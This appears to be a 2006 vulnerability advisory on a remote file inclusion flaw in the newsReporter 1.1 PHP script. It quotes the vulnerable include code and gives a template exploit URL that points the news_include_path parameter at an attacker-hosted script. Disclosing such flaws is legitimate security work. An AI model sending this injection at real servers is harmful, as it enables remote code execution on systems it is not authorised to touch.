newsReporter <= 1.1 (index.php) Remote Inclusion Vulnerability
2006-08-01 00:00:00>>> Kurdish Security
>>> newsReporter v1.1 Remote Command Execution
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : newsReporter
>>> Site : http://www.knusperleicht.at
Code :
// removed the old code because it was not correct. /str0ke
// INCLUDE PATH
@define(NEWS_INCLUDE_PATH, $news_include_path);
// INCLUDE PATH
//Dateien importieren
include NEWS_INCLUDE_PATH."inc/config.inc.php";
Vulnerability :
http://www.site.com/[scriptpath]/index.php?news_include_path=[script]
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.

